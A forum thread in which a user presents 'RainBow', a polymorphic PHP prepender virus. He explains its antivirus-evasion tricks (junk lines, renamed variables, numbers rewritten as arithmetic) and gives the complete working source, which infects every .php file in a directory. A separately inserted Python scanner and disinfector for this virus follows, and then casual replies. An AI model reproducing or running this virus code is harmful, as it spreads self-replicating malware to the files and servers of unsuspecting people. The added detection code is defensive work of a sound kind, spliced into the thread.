Virus in PHP .RainBow

Started by freak, December 10, 2006, 05:32:33 PM


freak

--> Adding Trash/Junk/Garbage
      The virus adds a junk line to one in two lines of the code.
      This junk line could contain:
      - // anything
      - $anything='anything';
      - $anything=number;
      Because the code would be damn big after the 5th generation, I decided
      to delete the trash after every generation and make a new one. Anyway,
      the chance to get a trash line will be bigger, because there are more
      lines (more lines --> more chance). But I tested about 30 generations
      and it's no big problem with the size.

      --> Changing Variable/function names
      The virus uses an array with all variable/function names of the virus;
      every generation it changes every array entry (every name) to a new name
      5-15 characters long.

      --> Number changing
      The virus is able to change every number in the code. This is a really
      successful way to fool AVs, I think! A number (for instance '10') could
      also be one of the following things:
      10=(8+2)
      10=(19-9)
      10=(130/13)
      It's easy to understand, I think. I decided to change every 5th number I can
      find, because it looks better than changing every number every generation.


    * Infection Method

      --> Prepender
      This code is a prepender virus, which doesn't harm the victim file.
      It reads the first PHP part (which is the whole virus code) of the current
      file (__FILE__, as it's called in PHP). Then it searches for every PHP file
      in the current directory, and adds the changed virus code at the beginning of
      the victim file. Before infecting, the virus checks if there's already an
      infection mark of the virus, which is 'RainBow'.

  Something else a little interesting is that it's hard to get many different generations from
  the virus, because it only changes if it infects a file. And only the infected file has the
  different form, not the old virus. That's a little trick which I read in an article about
  polymorphism by SnakeByte. He wrote that it will take more time to get many generations, which
  is a problem for AVs (who need many generations).

   In the end I want to thank the following people, who made it possible for me to
   write this virus :)

<?php // RainBowsrand((double)microtime()*1000000); $changevars=array('changevars','string','newcont','curdir','filea','victim','viccont','newvars','returnvar','counti','countj','trash','allcont','number','remn'); $string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10)); $newcont='<?php // RainBow'.chr(13).chr(10);while ($string && $string!='?>
'){
if(rand(0,1)){
if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.chr(39).trash('',0).chr(39).';'.chr(13).chr(10);}
if(rand(0,1)){$newcont.='$'.trash('',0).'='.rand().';'.chr(13).chr(10);}}
$string=strtok(chr(13).chr(10));
if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}}
$counti=0;
while($changevars[$counti]){
$newcont=str_replace($changevars[$counti++],trash('',0),$newcont);}
$countj=-1; $number='';
while(++$countj<strlen($newcont)){
if (ord($newcont{$countj})>47&&ord($newcont{$countj})<58){
$number=$newcont{$countj};
while(ord($newcont{++$countj})>47&&ord($newcont{$countj})<58){$number.=$newcont{$countj};}
$remn=rand(1,10);
if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break;
case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break;
case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}}
$allcont.=$newcont{$countj};$number='';}
$curdir=opendir('.');
while($filea=readdir($curdir)){
if(strstr($filea,'.php')){$victim=fopen($filea,'r+');
if (!strstr(fread($victim, 25),'RainBow')){rewind($victim);
$viccont=fread($victim,filesize($filea));
rewind($victim);
fwrite($victim,$allcont.$viccont);}
fclose($victim);}}
closedir($curdir);
function trash($returnvar, $countj){
do{$returnvar.=chr(rand(97,122));}while($countj++<rand(5,15));
return $returnvar;}
?>
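The prepender behaviour and the 'RainBow' mark described in the post give a defender a simple handle on this family: the mark sits in the first 25 bytes (the same window the virus itself inspects before infecting), the victim's own code follows the prepended block unchanged, and the junk lines have only three shapes (`// word`, `$word='word';`, `$word=number;`, where a number may have been rewritten as `(a+b)`, `(a-b)` or `(a/b)`). The following Python scanner is an added example, not freak's code or anything from the thread. It flags marked .php files in a directory, separates the prepended block from the original content, counts junk-shaped lines in the block, and can hand back the original content. The sample files are constructed for the example, and the assumption that the prepended block ends at the first closing `?>` tag, as well as all function names, are mine.

```python
import os
import re

MARKER = b"RainBow"
HEADER_WINDOW = 25  # the post says the virus looks for its mark in the first 25 bytes

# Junk lines in the shapes the post lists: '// anything', "$anything='anything';",
# '$anything=number;' (the number-changing step may rewrite a number as '(a+b)',
# '(a-b)' or '(a/b)'). Names are lowercase letters only, as the post describes.
JUNK_LINE = re.compile(
    rb"^(?://\s*[a-z]+|\$[a-z]+='[a-z]*';|\$[a-z]+=(?:\d+|\(\d+[-+*/]\d+\));)$"
)

# Constructed samples for this example (not real infected files): one file carrying a
# prepended block in front of its original code, and one clean file.
INFECTED_SAMPLE = (
    b"<?php // RainBow\r\n"
    b"// qzlkmwe\r\n"
    b"$abcde='xyzzy';\r\n"
    b"$fghij=(8+2);\r\n"
    b"$klmno=4711;\r\n"
    b"?>\r\n"
    b"<?php echo 'hello'; ?>\r\n"
)
CLEAN_SAMPLE = b"<?php echo 'hello'; ?>\r\n"


def is_marked(data: bytes) -> bool:
    """True if the infection mark sits in the window the virus itself inspects."""
    return MARKER in data[:HEADER_WINDOW]


def split_prepended(data: bytes):
    """Split a marked file into (prepended block, original content).

    Assumption (mine, not from the post): the prepended block ends at the first
    closing '?>' tag; a prepender leaves the victim's code after it untouched.
    """
    if not is_marked(data):
        return b"", data
    end = data.find(b"?>")
    if end == -1:  # no terminator found: treat the whole file as the block
        return data, b""
    end += len(b"?>")
    if data[end:end + 2] == b"\r\n":  # swallow the line ending after the tag
        end += 2
    elif data[end:end + 1] == b"\n":
        end += 1
    return data[:end], data[end:]


def count_junk_lines(block: bytes) -> int:
    """Count the lines of a prepended block that match the junk-line shapes."""
    return sum(1 for line in block.splitlines() if JUNK_LINE.match(line.strip()))


def disinfect(data: bytes) -> bytes:
    """Return the file content with the prepended block removed."""
    return split_prepended(data)[1]


def scan_directory(path: str):
    """Yield (filename, junk-line count) for every marked .php file in path."""
    for name in sorted(os.listdir(path)):
        if not name.lower().endswith(".php"):
            continue
        full = os.path.join(path, name)
        if not os.path.isfile(full):
            continue
        with open(full, "rb") as fh:
            data = fh.read()
        if is_marked(data):
            block, _ = split_prepended(data)
            yield name, count_junk_lines(block)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, junk in scan_directory(target):
        print(f"{name}: marked, {junk} junk-shaped lines in prepended block")
```

Run it against a directory of PHP files to list the marked ones; `disinfect` is deliberately kept separate from `scan_directory` so that nothing is rewritten on disk without a human deciding to. The junk-line count is a heuristic, not a signature: the number-changing step can touch numbers anywhere in the block, so the mark in the header and the block's position in front of the original code are the stable properties to key on.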

Hendrix

Well, if it's in PHP there's nothing to be afraid of at all... :D :D

How many of you have EasyPHP (to name one) on your PC??? :D :D

Cheers ;)


freak

Quote from: Hendrix on December 10, 2006, 05:54:58 PM
Well, if it's in PHP there's nothing to be afraid of at all... :D :D

How many of you have EasyPHP (to name one) on your PC??? :D :D

Cheers ;)



me  :-\

Hendrix

xD xD xD well, be careful... :D :D :D ;) ;) ;)

PS: I don't have it for 2 reasons: 1, because it takes up a significant number of MB on the PC, and with the programs plus their compilers + eMule I'm running dry... And the other because I don't program much in PHP.. :D :D

If I programmed in PHP I'd download some program other than EasyPHP... ;) ;) since it's heavy because of everything it bundles.

Cheers


freak

Quote from: Hendrix on December 10, 2006, 07:03:35 PM
xD xD xD well, be careful... :D :D :D ;) ;) ;)

PS: I don't have it for 2 reasons: 1, because it takes up a significant number of MB on the PC, and with the programs plus their compilers + eMule I'm running dry... And the other because I don't program much in PHP.. :D :D

If I programmed in PHP I'd download some program other than EasyPHP... ;) ;) since it's heavy because of everything it bundles.

Cheers



okay .. I'll keep it in mind, and while we're at it, recommend me one :D ;)

Hendrix

I'll leave you the program a friend of mine made; follow its development, since for now it's a beta, I think.

http://foro.elhacker.net/index.php/topic,150198.0.html

Cheers